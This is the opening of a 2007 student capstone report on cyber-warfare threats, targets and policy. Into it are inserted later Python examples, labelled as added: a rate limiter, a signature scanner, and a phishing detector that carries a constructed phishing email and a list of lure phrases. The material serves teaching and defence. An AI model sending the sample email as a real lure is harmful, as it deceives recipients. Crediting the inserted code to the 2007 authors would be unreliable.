Cyberwarfare Vulnerability Assessment (2007)


Cyber-Warfare: The New Front

A Technology Assessment

E 497 B Benjamin Franklin Scholars Capstone

Final Report December 5, 2007

Zach Adams

Tyler Barker

Matthew Bruchon

Daniel Clark

Kenny Fearn

Garrett LaRue

Chris Saunders

Katie Woodruff

Table of Contents

0 EXECUTIVE SUMMARY ... 6
  0.1 Introduction ... 7
    0.1.1 Is Cyber-warfare a Real Threat? ... 7
    0.1.2 Defining Cyber-attacks ... 7
  0.2 Tools ... 8
    0.2.1 Hacking ... 8
    0.2.2 Denial of Service ... 8
    0.2.3 Computer Viruses ... 9
    0.2.4 Packet Sniffing ... 9
    0.2.5 Social Engineering ... 9
    0.2.6 SCADA Systems ... 10
  0.3 Targets ... 10
    0.3.1 Military and Government ... 11
    0.3.2 Financial Systems ... 11
    0.3.3 Critical Infrastructure ... 12
    0.3.4 Transportation Systems ... 12
  0.4 Consequences ... 13
    0.4.1 Economic Consequences ... 13
    0.4.2 Social Effects ... 14
  0.5 National Agencies and Legislation ... 14
    0.5.1 E-Government Act of 2002 ... 14
    0.5.2 National Infrastructure Advisory Council ... 15
    0.5.3 National Strategy to Secure Cyberspace ... 15
    0.5.4 United States Computer Emergency Response Team (US-CERT) ... 15
  0.6 Policies ... 15
    0.6.1 National Policies ... 16
    0.6.2 Policy Goals ... 16
    0.6.3 Guiding Principles ... 16
    0.6.4 Stakeholders ... 17
    0.6.5 Policies of Prevention ... 17
    0.6.6 Policies of Response ... 17
    0.6.7 Policies for Public Awareness and Training ... 18
    0.6.8 Policies for Government Cyber-security ... 19
    0.6.9 Policies for U.S. and International Cyber-warfare Collaboration ... 19
    0.6.10 Policies for Military Use of Cyber-warfare ... 20
  0.7 Conclusion ... 21
    0.7.1 Is Cyber-warfare a Threat? ... 21
    0.7.2 The Way Forward ... 21

1 INTRODUCTION ... 23
  1.1 What Is at Stake? ... 24
  1.2 Is Cyber-Warfare a Real Threat? ... 25
  1.3 Defining Cyber-attacks ... 26

2 TOOLS FOR CYBER-ATTACKS ... 27
  2.1 Hacking ... 28
  2.2 Denial of Service Attacks ... 28
    2.2.1 Vulnerabilities ... 29
    2.2.2 Sensor Networks ... 30
    2.2.3 Denial of Service on the Internet ... 30
    2.2.4 Executing a Distributed DoS Attack ... 31
    2.2.5 Hacking Communities ... 33
    2.2.6 Case Study - United States and China Cyber-Conflict in 2001 ... 34
    2.2.7 Defense against DoS Attacks ... 35
    2.2.8 Defending Individual Systems ... 35
    2.2.9 Defending Local Networks ... 36
    2.2.10 Defending Extended Networks ... 36
    2.2.11 Case Study: Estonia DDoS Attacked by Russia ... 37
  2.3 Computer Viruses ... 37
    2.3.1 Types of Viruses ... 38
    2.3.2 Effects of Viruses ... 38
    2.3.3 Defense against Viruses ... 39
  2.4 Packet Sniffing ... 40
    2.4.1 Data Streams and Packets ... 40
    2.4.2 File Transfer Protocols ... 40
    2.4.3 Networking Schemes ... 40
      2.4.3.1 Ethernet Networks ... 40
      2.4.3.2 WiFi Networks ... 41
      2.4.3.3 Network Interface Cards and Promiscuous Mode ... 41
    2.4.4 Implementations ... 42
      2.4.4.1 Spoofing ... 42
      2.4.4.2 Limitations and Counters ... 42
    2.4.5 Scenarios ... 43
      2.4.5.1 Public WiFi Service ... 43
      2.4.5.2 University Networks ... 44
  2.5 Social Engineering ... 44
    2.5.1 Confidence Schemes or Trust and Attack Models ... 44
    2.5.2 Phishing ... 44
    2.5.3 Dumpster Diving ... 45
    2.5.4 Case Studies ... 45
  2.6 SCADA Systems ... 46
    2.6.1 Scope of the Threat to SCADA Systems ... 47
    2.6.2 Vulnerabilities ... 48
      2.6.2.1 Original Development Flaws ... 48
      2.6.2.2 Corporate Network Security ... 49
      2.6.2.3 Company Security Procedures ... 49
      2.6.2.4 Who Could Gain Access? ... 50
    2.6.3 Case Studies ... 51
      2.6.3.1 Hunter Watertech ... 51
      2.6.3.2 Roosevelt Dam ... 51

3 TARGETS ... 52
  3.1 Military and Government ... 53
    3.1.1 Data Theft and Corruption ... 53
    3.1.2 Battlefield Cyber-attacks ... 54
    3.1.3 Foreign Threats ... 56
  3.2 Financial Systems as a Target ... 57
    3.2.1 Overview ... 57
    3.2.2 Direct Attacks on Financial Systems ... 58
  3.3 Infrastructure ... 59
    3.3.1 Power Utilities ... 59
      3.3.1.1 Why is the Power Grid so Vulnerable? ... 60
      3.3.1.2 What is Being Done? ... 62
    3.3.2 Emergency Response ... 62
    3.3.3 Communications ... 63
  3.4 Transportation Systems as a Target ... 63
    3.4.1 Public Transit Systems ... 64
    3.4.2 Shipping Networks ... 64
    3.4.3 Air Transportation Networks ... 66
      3.4.3.1 Aircraft Internal Electronic Control Systems ... 67
      3.4.3.2 Air Traffic Control System ... 68
    3.4.4 Conclusions ... 70

4 CONSEQUENCES ... 72
  4.1 Economic Consequences of Cyber-Warfare ... 73
    4.1.1 Economic Consequences of Hacking ... 73
    4.1.2 Economic Consequences of Infrastructure Attacks ... 73
    4.1.3 Economic Consequence of Combined Attacks ... 75
  4.2 Social Effects ... 76
    4.2.1 Public Confidence in the Government ... 76
    4.2.2 Public Confidence in Target ... 77

5 NATIONAL AGENCIES AND LEGISLATION ... 79
  5.1 E-Government Act of 2002 ... 80
  5.2 National Infrastructure Advisory Council ... 80
  5.3 National Strategy to Secure Cyberspace ... 81
  5.4 United States Computer Emergency Response Team (US-CERT) ... 81
    5.4.1 US-CERT Einstein Program ... 81
    5.4.2 Collaborative Groups of US-CERT ... 82
    5.4.3 National Cyber Security Division (NCSD) ... 83
      5.4.3.1 National Cyberspace Response System ... 83
      5.4.3.2 Cyber Risk Management Programs ... 84

6 POLICY ... 85
  6.1 National Policies ... 86
  6.2 Policy Goals ... 86
  6.3 Guiding Principles ... 87
    6.3.1 Social Considerations ... 87
  6.4 Stakeholders ... 88
  6.5 Prevention ... 90
    6.5.1 Prevention Challenges ... 90
    6.5.2 Prevention Products ... 91
    6.5.3 Security Personnel ... 92
    6.5.4 New Vulnerabilities ... 93
    6.5.5 Computer Security and Liability ... 93
    6.5.6 Policy Options ... 93
  6.6 Response ... 95
    6.6.1 Judicial Response to Past Attacks ... 95
      6.6.1.1 Russian Man Sentenced for Hacking into Computers in the United States ... 96
      6.6.1.2 Melissa Virus ... 96
      6.6.1.3 Disgruntled Employee ... 96
      6.6.1.4 Israeli Citizen Arrested in Israel for Hacking Government Computers ... 96
      6.6.1.5 Konopka Attacks ... 96
    6.6.2 National Cyberspace Response System ... 97
    6.6.3 Public and Private Ways to Communicate ... 98
    6.6.4 Sharing Information ... 99
    6.6.5 Policy Options ... 99
  6.7 Policies to Promote Cyber-security Awareness and Training ... 100
    6.7.1 Policies for Home and Small Business Users ... 100
    6.7.2 Policies for Large Enterprises ... 101
    6.7.3 Policies for Critical Sectors and Infrastructures ... 102
    6.7.4 Policies for the Nation as a Whole ... 103
  6.8 Government Cyber-security ... 104
    6.8.1 Federal Level Security ... 104
    6.8.2 Agency Level Security ... 105
    6.8.3 Areas for Improvement ... 106
  6.9 US and International Cyber-warfare Collaboration ... 107
    6.9.1 United States National Security Policies ... 107
      6.9.1.1 Securing the Nation’s Cyberspace ... 108
    6.9.2 United States International Policies ... 109
      6.9.2.1 Utilize International Organizations to Promote a Global “Culture of Security” ... 109
      6.9.2.2 Develop Secure Networks ... 109
      6.9.2.3 Promote North American Cyberspace Security ... 110
      6.9.2.4 Establish International Network of Agencies for Information Relay ... 110
      6.9.2.5 Encourage Other Nations to Follow the Council of Europe Convention on Cyber-crime ... 110
    6.9.3 International Cyber-security Collaboration ... 110
    6.9.4 International Policies ... 111
      6.9.4.1 United Kingdom ... 111
      6.9.4.2 Germany ... 111
      6.9.4.3 Russia ... 112
      6.9.4.4 People’s Republic of China ... 113
  6.10 Military Policy ... 113
    6.10.1 Current Military Cyber Units ... 113
    6.10.2 Military Uses of Cyber-warfare ... 114
    6.10.3 Future of Cyber-warfare in the Military ... 114
    6.10.4 Policy Questions ... 116

7 CONCLUSION ... 118
  7.1 Is Cyber-warfare a threat? ... 119
  7.2 The Way Forward ... 119
    7.2.1 What Can Be Done Now ... 119
    7.2.2 Policies for the Near Future ... 120
    7.2.3 Future Research ... 121
    7.2.4 Conclusion ... 121

8 APPENDIX ... 122
  8.1 Policy Options ... 123
  8.2 Open Letter to the President ... 128
  8.3 Interview with Douglas Reeves ... 133
  8.4 DHS Presidential Directive ... 136
  8.5 Works Cited ... 137


0 Executive Summary


0.1 Introduction

In the United States, nearly every vital system is connected in some way to the Internet. Originally designed to allow communication in the event of a nuclear war, the Internet could be the next weapon used to attack a society revolving around information technology. Cyber-warfare has the potential to cause catastrophic damage to these systems in a world vastly influenced by cyberspace.

Given this assumption, one must address the probability of various types and combinations of cyber-attacks that could damage critical systems, as well as the options for response and prevention. Securing these systems will require significant resources from the public and private sectors, as well as significant effort from everyone connected to the Internet. Given the power and influence of cyber-warfare, it could also serve as an effective military offensive weapon.

0.1.1 Is Cyber-warfare a Real Threat?

Many of our critical systems are not yet completely reliant on computers, which keeps them from being appealing or practical targets for attack. This means that at present, a cyber-attack would be most effective in conjunction with a traditional attack to cause physical damage; the more likely consequences of a focused cyber-attack are economic and social. However, as reliance on computers increases steadily with time, future threats will develop where current threats do not exist, and the risk of physical damage and loss of life from a cyber-attack will increase unless proactive policies are implemented.

0.1.2 Defining Cyber-attacks

There are three primary classes of cyber-attacks: cyber-crime, cyber-terrorism, and cyber-warfare. If an attack is not intended to threaten national security or further a national or ideological objective, it is considered cyber-crime.[1] If it is intended to achieve a national or ideological objective, then it is classified as either cyber-warfare or cyber-terrorism.

Cyber-terrorism refers to cyber-attacks launched by individuals or small organizations that are intended to further political or social objectives by coercing a government or its people.[2] Cyber-warfare has the same objectives as cyber-terrorism, except that it consists of cyber-attacks launched by a national government as an act of war, just as a physical attack would be.[3]

[1] Alford, Jr., Lt. Col. Lionel D. "Cyber Warfare: Protecting Military Systems." Acquisition Review Quarterly Spring 2000: 101-120. 18 Oct. 2007 <http://www.dau.mil/pubs/arq/2000arq/alford.pdf>
[2] Denning, D. (2001). "Is Cyber Terror Next?" New York: U.S. Social Science Research Council, at http://www.ssrc.org/sept11/essays/denning.htm
[3] Alford, Jr., Lt. Col. Lionel D. "Cyber Warfare: Protecting Military Systems." Acquisition Review Quarterly Spring 2000: 101-120. 18 Oct. 2007 <http://www.dau.mil/pubs/arq/2000arq/alford.pdf>


0.2 Tools

0.2.1 Hacking

Traditionally, the term “hacker” has simply been used to refer to a skilled computer user.[4] In recent years, this term has been seized by the media and has come to refer specifically to malicious computer users. Due to the popularity and familiarity of the term, “hacking” will be used in this document to refer to all forms of cyber-attacks, and “hacker” for the individuals initiating them.

Most hackers are either financially or socially motivated, and have Internet communities dedicated to hacking in which they can share software exploits and other methods of launching cyber-attacks. Sometimes hackers even sell these vulnerabilities on underground auction sites.[5][6] Their goals usually consist of information theft or damage to computer systems, since they can use vulnerabilities in sensitive systems and stolen information to cripple vital computer processes. The tools in this section are a small selection of a hacker’s arsenal, but provide a functional idea of how hackers view the systems that governments and corporations use to store and transfer information.

0.2.2 Denial of Service

Denial of Service (DoS) attacks can disable networks or computers by overloading network traffic, cut off communication between two computers, deny an individual user access to a system, or disrupt service for a particular system or person. Unfortunately, DoS attacks exploit the most basic limits of computers: they have finite memory, finite processing speed, and finite communication bandwidth.[7]

There will never be a way to fully overcome these limitations and prevent DoS attacks, since a system can be disabled as soon as it runs out of one of these needed limited resources. DoS attacks can disable practically any networked device, including but not limited to sensor networks and cell phones, not just computers. A distributed DoS attack takes control of unprotected computers, usually by exploiting systems with a known security flaw, and then uses these computers to attack a specific target. These security flaws are usually distributed throughout hacker communities, where hackers discuss and simplify their methods of cyber-attack. In the past, these targets have included the DNS servers that keep the Internet operational.[8]
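The resource-exhaustion point above has a defensive counterpart: a service can budget a finite resource per client so that one flooding client cannot consume all of it. The token-bucket limiter below is an added example written for this page, not code from the report; the `TokenBucketLimiter` class, the constructed one-second traffic mix in `simulate_flood`, and the chosen rate and burst values are all assumptions. It also shows the point practitioners most often miss: the limiter's own client table is a finite resource too, so it is bounded and evicts the least recently seen client rather than growing without limit under a flood of spoofed identities.

```python
import time
from collections import OrderedDict


class TokenBucketLimiter:
    """Per-client token bucket: each client may burst up to `burst` requests
    and is then refilled at `rate` tokens per second.

    The client table is bounded by `max_clients`; when it overflows, the least
    recently seen client is evicted. Without that bound a flood of spoofed
    client identities would exhaust the limiter's own memory, i.e. the defence
    itself would become the exhaustible resource.
    """

    def __init__(self, rate, burst, max_clients=10_000, clock=time.monotonic):
        self.rate = float(rate)
        self.burst = float(burst)
        self.max_clients = max_clients
        self.clock = clock  # injectable so the simulation below is deterministic
        self._buckets = OrderedDict()  # client_id -> (tokens, last_seen)

    def allow(self, client_id, cost=1.0):
        """Return True if the request is admitted, False if it should be dropped."""
        now = self.clock()
        # pop + reinsert moves the client to the most-recently-seen end
        tokens, last = self._buckets.pop(client_id, (self.burst, now))
        tokens = min(self.burst, tokens + (now - last) * self.rate)
        admitted = tokens >= cost
        if admitted:
            tokens -= cost
        self._buckets[client_id] = (tokens, now)
        while len(self._buckets) > self.max_clients:
            self._buckets.popitem(last=False)  # evict least recently seen
        return admitted

    def tracked_clients(self):
        return len(self._buckets)


class FakeClock:
    """Manually advanced clock so the simulation is exact and repeatable."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def simulate_flood(normal_clients=50):
    """Constructed traffic over one second, in 256 ticks of 1/256 s: one
    flooding client sends a request on every tick, while each normal client
    sends four requests (ticks 0, 64, 128, 192).
    Returns (flood_admitted, normal_admitted, normal_sent)."""
    clock = FakeClock()
    # burst 16, refill 16/s: tick length and refill are exact binary fractions
    limiter = TokenBucketLimiter(rate=16, burst=16, max_clients=1_000, clock=clock)
    flood_admitted = normal_admitted = normal_sent = 0
    for tick in range(256):
        if limiter.allow("flooder"):
            flood_admitted += 1
        if tick % 64 == 0:
            for i in range(normal_clients):
                normal_sent += 1
                if limiter.allow(f"client-{i}"):
                    normal_admitted += 1
        clock.advance(1 / 256)
    return flood_admitted, normal_admitted, normal_sent


def spoofed_identity_flood(identities=5_000, max_clients=100):
    """Every request arrives from a never-before-seen identity; the table must
    stay bounded regardless. Returns the number of clients still tracked."""
    limiter = TokenBucketLimiter(rate=1, burst=1, max_clients=max_clients, clock=FakeClock())
    for i in range(identities):
        limiter.allow(f"spoofed-{i}")
    return limiter.tracked_clients()


if __name__ == "__main__":
    print(simulate_flood())          # (31, 200, 200)
    print(spoofed_identity_flood())  # 100
```

The flooder is held to roughly burst plus one second of refill (31 of 256 requests), while every normal client's request is admitted; the limiter drops the excess rather than letting it reach the resource it protects.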

[4] Raymond, Eric. The on-line hacker Jargon File 4.4.7. 29 Dec 2003. 26 Nov 2007 http://www.catb.org/jargon/html/index.html
[5] Naraine, Ryan. Hackers Selling Vista Zero-Day Exploit. 15 Dec 2006. eWeek.com. 26 Nov 2007. <http://www.eweek.com/article2/0,1895,2073611,00.asp>
[6] Evers, Joris. Russian hackers ‘sold WMF exploit’. 3 Feb 2006. ZDNet.co.uk. 26 Nov 2007. <http://news.zdnet.co.uk/software/0,1000000121,39250232,00.htm>
[7] CERT Coordination Center – Denial of Service Attacks. 4 Jun 2001. US CERT. 30 Oct 2007 <http://www.cert.org/tech_tips/denial_of_service.html>
[8] Garber, Lee. Denial-of-Service Attacks Rip The Internet. IEEE – Computer. Apr 2000. 12-17


0.2.3 Computer Viruses

Viruses are a type of unwanted software that runs on a computer and is designed to self-replicate and spread to other computers. They are characterized by the way they spread to other systems, and their effects can range from displaying an annoying message to causing massive data loss, giving remote control of a computer, and disrupting network communication.

There is a large industry based on the development of tools like virus scanners to eliminate viruses before they can cause damage. Virus scanners are software that searches a computer for viruses and assists in their removal, and they are regularly updated to defend against new viruses. However, hackers are constantly racing with security professionals to stay ahead of these tools, and they have the advantage in that they can create new viruses and use them to cause damage before the virus is discovered and the scanner is updated to detect and remove it.[9]
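The race between new viruses and scanner updates can be made concrete. The scanner below is an added example, not the report's or any vendor's code; the two signature kinds, the byte strings standing in for files, and the `detection_race` scenario are constructed for illustration. It shows why a scanner that knows only a whole-file hash misses a trivially modified variant, how a signature on the variant's unchanged core routine (added in the next update) closes that gap, and that a genuinely new sample stays undetected until its own signature ships.

```python
import hashlib


class SignatureScanner:
    """Minimal signature-based scanner with two signature kinds: whole-file
    hashes (cheap and exact, but brittle) and byte patterns (survive cosmetic
    changes to the file around the matched routine)."""

    def __init__(self):
        self._hashes = {}    # sha256 hexdigest -> signature name
        self._patterns = {}  # signature name -> byte pattern

    def add_hash_signature(self, name, sample):
        self._hashes[hashlib.sha256(sample).hexdigest()] = name

    def add_pattern_signature(self, name, pattern):
        self._patterns[name] = pattern

    def scan(self, data):
        """Return the sorted names of all signatures matching `data`."""
        hits = set()
        digest = hashlib.sha256(data).hexdigest()
        if digest in self._hashes:
            hits.add(self._hashes[digest])
        for name, pattern in self._patterns.items():
            if pattern in data:
                hits.add(name)
        return sorted(hits)


# Constructed stand-ins for files. The "core" is the routine that stays the
# same across variants; the surrounding bytes are what a variant changes.
CORE_A = b"CONSTRUCTED-SAMPLE-A-CORE-ROUTINE"
CORE_B = b"CONSTRUCTED-SAMPLE-B-CORE-ROUTINE"
SAMPLE_A = b"MZ" + b"\x00" * 6 + CORE_A + b"\x00" * 8
SAMPLE_A_VARIANT = b"MZ" + b"\x01" * 6 + CORE_A + b"\x00" * 8  # header bytes changed
SAMPLE_B = b"MZ" + b"\x00" * 6 + CORE_B + b"\x00" * 8          # never seen before
CLEAN = b"MZ" + b"\x00" * 6 + b"ordinary-program-code" + b"\x00" * 8


def detection_race():
    """Scan four files before and after a signature update.
    Returns (before, after), each a dict of file name -> matched signatures."""
    scanner = SignatureScanner()
    scanner.add_hash_signature("sample-a/hash", SAMPLE_A)  # only the original is known

    files = {"a": SAMPLE_A, "a-variant": SAMPLE_A_VARIANT, "b": SAMPLE_B, "clean": CLEAN}
    before = {name: scanner.scan(data) for name, data in files.items()}

    # The update: analysts extract the invariant core of A, and add B once it is discovered.
    scanner.add_pattern_signature("sample-a/core", CORE_A)
    scanner.add_pattern_signature("sample-b/core", CORE_B)
    after = {name: scanner.scan(data) for name, data in files.items()}
    return before, after


if __name__ == "__main__":
    before, after = detection_race()
    for name in before:
        print(f"{name:10s} before={before[name]} after={after[name]}")
```

Before the update only the exact original file is caught; the one-byte-different variant and the new sample pass. After the update the core-routine pattern catches both A files, and B is caught only because its signature was added, which is the window the paragraph describes.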

0.2.4 Packet Sniffing

Packet sniffing is used to monitor traffic between devices on a network, and has a number of legitimate uses. However, hackers can also use packet sniffing to obtain sensitive data packets without penetrating a computer network’s security measures. Hackers can collect data by many methods, including data streams between two computers, unencrypted e-mails, unsecured WiFi networks, and network interface cards running in “promiscuous mode.”[10]

These techniques can be particularly valuable to hackers on large networks, like public WiFi access points or university networks, where a large amount of poorly secured information is frequently transferred. Once a hacker is on a network, he can use a variety of free, open-source packet sniffing programs to collect data packets, or “spoof” his computer’s identity on the network to receive data that was not intended for him. However, the capabilities of packet sniffing are limited by non-packet data transfers, secure programming with extra data encryption, packet sniffer detection programs, and increased public awareness of the threat.

0.2.5 Social Engineering

Social engineering combines hacking with low-tech methods like confidence schemes, physical surveillance, and probing emails. A confidence scheme can be used to obtain answers to password protection questions for many major websites and email clients. Email passwords are particularly useful targets, as many websites use password recovery systems that send the old or changed password to the user’s email. Another technique, called “phishing,” refers to fraudulent emails and websites designed to steal information from victims. Some hackers may even resort to dumpster diving, since many large companies simply throw out papers containing information like tax records, payroll account logins and passwords, and building security alarm codes.[11]

[9] Nachenberg, Carey. "Computer Virus-antivirus Coevolution." Communications of the ACM 40.1 (1997): 46-51.
[10] Crenshaw, Adrian. A Quick Intro to Sniffers. 30 July 2007. Iron Geek.com. 30 Oct 2007. <http://www.irongeek.com/i.php?page=security/AQuickIntrotoSniffers>.
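For the phishing technique described above, the header and link checks that a mail filter applies can be stated directly. The checker below is an added example and not part of the report; `TRUSTED_DOMAINS`, the lure phrases, and the two constructed messages (one phishing, one legitimate) are assumptions made for the demonstration. It flags a display name that invokes a trusted brand while the message comes from a foreign domain, a Reply-To that diverts replies elsewhere, a link whose visible text names a different host than its actual target, and a credential-lure subject line.

```python
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allow-list of domains the organisation really sends from.
TRUSTED_DOMAINS = {"examplebank.example"}
LURE_PHRASES = ("verify your account", "account suspended", "reset your password", "action required")


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _domain(address):
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def _host(text):
    # Visible link text usually lacks a scheme; add one so urlparse finds the host.
    if "://" not in text:
        text = "http://" + text
    return (urlparse(text).hostname or "").lower()


def phishing_indicators(raw_message):
    """Return human-readable indicators found in a raw RFC 822 message (bytes)."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    indicators = []

    display_name, sender = parseaddr(str(msg.get("From", "")))
    sender_domain = _domain(sender)

    # 1. Display name invokes a trusted brand, but the sending domain is not that brand's.
    for trusted in TRUSTED_DOMAINS:
        brand = trusted.split(".")[0]
        same_org = sender_domain == trusted or sender_domain.endswith("." + trusted)
        if brand in display_name.lower() and not same_org:
            indicators.append(f"display name '{display_name}' but sender domain '{sender_domain}'")

    # 2. Replies are routed to a different domain than the one that sent the message.
    _, reply_to = parseaddr(str(msg.get("Reply-To", "")))
    if reply_to and _domain(reply_to) != sender_domain:
        indicators.append(f"Reply-To domain '{_domain(reply_to)}' differs from sender domain")

    # 3. A link's visible text names one host while its href points at another.
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        collector = _LinkCollector()
        collector.feed(body.get_content())
        for href, text in collector.links:
            if _host(text) and _host(href) and _host(text) != _host(href):
                indicators.append(f"link text '{text}' actually points to '{_host(href)}'")

    # 4. Credential-harvesting lure in the subject line.
    subject = str(msg.get("Subject", "")).lower()
    if any(phrase in subject for phrase in LURE_PHRASES):
        indicators.append(f"lure phrase in subject: '{subject}'")

    return indicators


# Constructed sample messages (not real mail).
PHISHING_SAMPLE = b"""From: "ExampleBank Security" <alerts@examplebank-secure.example>
Reply-To: recover@mailbox-relay.example
To: user@example.org
Subject: Action required: verify your account
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Your account has been suspended. Please
<a href="http://examplebank-secure.example/login">examplebank.example/login</a>
to restore access.</p></body></html>
"""

LEGITIMATE_SAMPLE = b"""From: "ExampleBank Statements" <statements@examplebank.example>
To: user@example.org
Subject: Your March statement is available
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Sign in at
<a href="https://examplebank.example/statements">examplebank.example/statements</a>.</p></body></html>
"""

if __name__ == "__main__":
    for line in phishing_indicators(PHISHING_SAMPLE):
        print("phishing:", line)
    print("legitimate:", phishing_indicators(LEGITIMATE_SAMPLE))  # []
```

Each indicator is a weak signal on its own (a legitimate mailing service may set its own Reply-To, for instance), so a filter would score them together rather than block on any single one; the constructed phishing message trips all four, the legitimate one none.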

0.2.6 SCADA Systems

Supervisory Control and Data Acquisition (SCADA) systems collect data from sensors in a factory or infrastructure plant and can make changes remotely to optimize a process based on the received data. These systems control a number of physical parameters, such as a conveyor belt’s speed, a tank’s temperature and pressure, or any process which can be controlled without direct human manipulation. As a result, hackers who infiltrate these systems can cause direct physical effects.[12]

The biggest security vulnerabilities of SCADA systems are in their original design: most systems currently in use were designed twenty or more years ago, and are unsecured because they did not account for the emergence of corporate networks. Because they were not intended to be networked, most SCADA systems being used in critical infrastructure are not properly secured and have multiple entry points that can be exploited.[13]

Moreover, the security systems of corporate networks, through which hackers can reach the SCADA systems, are often improperly implemented. As a result, many serious cyber-incidents involving SCADA systems have already occurred, including one in Australia in which a former water company employee drained millions of gallons of sewage into parks and rivers, and one in which a 12-year-old boy accidentally gained control over the Roosevelt Dam’s floodgate controls.[14]

0.3 Targets

As the entire world continuously becomes more connected through the Internet, the threat of cyber-attacks has become an issue that should not be ignored. Our nation’s cyber-security is something that must be fixed, because cyber-attacks can be performed by any individual, group, or government. The difficult aspect of protecting ourselves is that cyber-warfare targets are not limited to governmental agencies and the military; cyber-warfare also affects global corporations, public utilities, and transportation systems.

Because the United States is so dependent on its critical infrastructure (Internet, power, et cetera), it is absolutely critical that the government makes securing our cyberspace a top priority.

[11] Grifter. Dumpster Diving – One Man’s Trash… Hack In The Box. 2002. 26 Nov 2007. <http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=6388&mode=thread&order=0&thold=0>
[12] Byres, Eric, and Justin Lowe. The Myths and Facts Behind Cyber Security Risks for Industrial. British Columbia Institute of Technology. 1-6. 15 Oct. 2007 <http://www.tswg.gov/tswg/ip/The_Myths_and_Facts_behind_Cyber_Security_Risks.pdf>.
[13] Understanding SCADA System Security Vulnerabilities. Riptech. 2001. 1-5. 23 Oct. 2007 <http://www.iwar.org.uk/cip/resources/utilities/SCADAWhitepaperfinal1.pdf>.
[14] Gellman, Barton. "U.S. Fears Al Qaeda Cyber Attacks." SecurityFocus 26 June 2002. 18 Oct. 2007 <http://www.securityfocus.com/news/502>.


Before policy options can be discussed, we must first review potential threats to and vulnerabilities of our systems.

0.3.1 Military and Government

Because the government and military are what keep the United States running, they are an obvious target for cyber-attack. Over the past decade, several data theft attempts have been documented in which hackers broke through network defenses searching for critical governmental and military documents. One such attack, known as “Moonlight Maze,” resulted in troop structures and base configurations being stolen from the Pentagon.[15] This example demonstrates the severity of our military’s cyber-security issues.

Another form of cyber-attack that concerns the military is battlefield attacks. Although the threat on the front lines is limited, hackers could infiltrate command and control systems in the rear, and give false commands or send incorrect troop information, leading to an ambush.[16] Therefore, due to the potential harm that could be done if the military’s communication system were infiltrated, cyber-defenses in this realm must be improved.

0.3.2 Financial Systems

The biggest threat to our nation’s financial systems comes from terrorist organizations that have no current interest in the welfare of the United States economy. Osama bin Laden made his goals very clear in 2001 when he stated:

    If their economy is destroyed, they will be busy with their own affairs rather than enslaving the weak peoples. It is very important to concentrate on hitting the U.S. economy through all possible means.[17]

From his comments, and the fact that over half of all cyber-attacks in 2001 targeted financial systems,[18] the need to secure our banks and credit unions from cyber-attack is clear.

Financial service providers have historically had a reputation for protecting clients’ critical data and financial assets, but current vulnerabilities in electronic financial transfer systems threaten to expose those assets and information to cyber-attack. For example, money transfers made through wireless Internet or cell phones can be intercepted, and the fiber optic cables that enable the transfer of financial data around the world can be tapped without detection.

[15] “Cyber-war!.” PBS: Frontline. April 2003. 29 Oct. 2007 <http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/>
[16] Krebs, Brian. “Cyber war games test future troops.” Washington Post: April 23, 2003.
[17] Pethokoukis, James. “Capital Commerce. So How Goes Bin Laden’s War on the U.S. Economy?” September 11, 2007
[18] Glaessner, Thomas. “Electronic Security: Risk Mitigation In Financial Transactions”. The World Bank: 2002.


0.3.3 Critical Infrastructure

America’s critical infrastructure is one of the structures in our nation most vulnerable to cyber-attack. Systems such as power grids, communications, and emergency response are linked through thousands of miles of Internet lines, making it almost impossible to secure the entire network.[19]

The threat of infrastructure attack was realized in 2001 when the FBI discovered that cyber-intruders were researching utilities, government offices, and emergency systems of cities all over the country. This discovery became even more terrifying when, a few months later, American intelligence agencies seized Al Qaeda laptops and found what appeared to be a “broad pattern of surveillance of U.S. infrastructure.”[20]

If attackers successfully hacked into a power utility grid, they could potentially shut down plants and even break power generators. Although they would not be able to take out the entire power grid, due to the redundancies built into the system, the attackers could shut off the power in a region, causing significant damage to the area’s economy.[21]

Another potentially disastrous situation involving power utilities and communication systems is if an opposing government used a cyber-attack in conjunction with a physical attack. This would cause power outages and public chaos due to the inability to relay information during a time of crisis. The government must lead research efforts to secure our infrastructures in order to prevent and defend against cyber-attacks.

0.3.4 Transportation Systems

Transportation systems could conceivably be an appealing target to potential cyber-attackers due to the integral role they play in the economy. Over ten percent of the United States’ gross domestic product comes from transportation.[22]

Of all the nation’s transportation systems, the aviation network currently has the highest risk of cyber-attack due to its extensive computer networks. Other systems that can be attacked are public transit systems and shipping networks, but their relatively low use of computer systems keeps the potential for devastating attacks low. However, the air traffic control system for the aviation network is extremely vulnerable due to the outdated computers and defenses that are being used.[23]

[19] Shainker, R. “Electric Utility Responses to Grid Issues.” IEEE Power & Energy Magazine. March/April 2006: 31. 24 Oct. 2007 <http://www.lib.ncsu.edu:2178/iel5/8014/33609/01597993.pdf?tp=&arnumber=1597993&isnumber=33609>
[20] “Cyber-war!.” PBS: Frontline. April 2003. 29 Oct. 2007 <http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/>
[21] Meserve, J. “Staged cyber attack reveals vulnerability in power grid.” CNN. 26 September 2007. 4 Oct. 2007. <http://www.cnn.com/2007/US/09/26/power.at.risk/>
[22] Szyliowicz, Joseph S. (2004). International transportation security. Review of Policy Research. 21

Regional air traffic control centers have shut down several times in recent history, but in each case neighboring control centers were able to handle the additional traffic load. If an attacker were able to hack into the air traffic control computers and shut down the entire nation’s air traffic radar or communications systems, though (something that has not happened to date), planes would have to navigate and land without assistance, raising the risk of accident and opening the door for some kind of conventional attack. Due to the potential worst-case damage that could result from cyber-attacks on the aviation network, these computer systems must be more fully secured.

